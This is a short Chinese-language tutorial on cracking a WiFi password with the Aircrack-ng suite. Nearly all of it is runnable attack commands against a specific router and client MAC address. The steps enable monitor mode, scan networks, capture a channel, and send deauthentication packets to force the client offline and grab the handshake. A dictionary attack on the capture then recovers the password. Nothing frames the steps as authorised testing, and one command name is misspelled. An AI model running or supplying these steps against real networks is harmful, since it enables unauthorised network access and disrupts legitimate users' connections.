近源渗透 | 使用Aircrack-ng破解wifi密码

设置wlan为监听模式

airmon-ng start wlan0   #开启网卡wlan0监听模式iwconfig                #查看网卡状态，发现wlan0mon，表示已开启成功

探测附近WiFi

airdump-ng wlan0mon

• BSSID 代表路由器的MAC地址；

• PWR 代表信号的强度，数值越大代表信息越强；

• CH 代表信道；

• ENC代表用的加密的方式；

• AUTH 代表认证的方式；

• ESSID是WIFI的名字；

监听路由

sudo airodump-ng -c 8 -w  /home/wifi  --bssid F0:16:28:21:FB:EA  wlan0mon

• -c 信道数

• -w cap存储路径

• -bssid AP mac地址

对目标用户发起攻击使其掉线

对目标用户发起攻击使其掉线，wifi重连，获取一次握手数据包

aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon

• -0 5 攻击模式 攻击次数

• -a AP m a c地址

• -c 用户的 mac地址

数据包重放破解wifi密码

aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA  /home/wifi-01.cap

• -w 密码字典路径

• -b AP mac地址

• 上一步流量包路径